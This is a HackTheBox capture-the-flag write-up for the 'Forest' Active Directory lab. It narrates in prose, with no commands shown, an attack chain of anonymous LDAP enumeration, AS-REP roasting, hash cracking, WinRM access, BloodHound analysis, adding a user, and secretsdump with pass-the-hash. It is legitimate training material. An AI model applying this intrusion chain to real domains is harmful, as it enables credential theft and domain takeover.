HackTheBox | Forest
This is actually the first AD box I’ve ever done.
Let’s start with an Nmap scan on the target:
After it’s complete we just need to cat out the txt file.
Since we know the domain, let’s try out ldapsearch to check for anonymous authentication. Since we can query the domain anonymously, null bind is enabled.
There is a ton of information here. The first thing I did was try to find any and all account names.
Still a ton of unique account names here. Off the rip the interesting ones appear to be: andy, lucinda, mark, santi, and sebastien
To clean the ldapsearch return up, let’s change our initial command a bit
Thankfully, all of our identified users are at the bottom of this return.
This includes a slew of information, including emails for each user. Let’s create a username list out of this information to try some password attacks.
Let’s get this started.
Now we can attempt to use an impacket script, specifically GetNPUsers.py. This will look for users that don’t require Kerberos pre-auth. We actually got a hit for another account running this.
As well, we get a hash.
John cracks this pretty quick.
To say I got a little stuck here is an understatement. I ended up running nmap again with a less aggressive scan.
This led me into WinRM. I actually wasn’t aware it would read as HTTP with -sV. At this point I also stopped the password attack.
Now we retrieve the user flag.
Privilege escalation time. For the sake of keeping it classy, let’s use BloodHound.
For some reason, no matter how many times I ran this, the groups file that was generated was always empty.
After taking a break and coming back later, I decided I would try running the exe version of the tool directly on the system. I ended up hosting it with impacket and utilizing New-PSDrive to move the file over.
Finally, after ingesting this into BloodHound, it worked.
The most interesting part was this:
Let’s add a new user now.
Now we need PowerView.
To finish this off, we can run secretsdump.
Now let’s connect with the hash for administrator.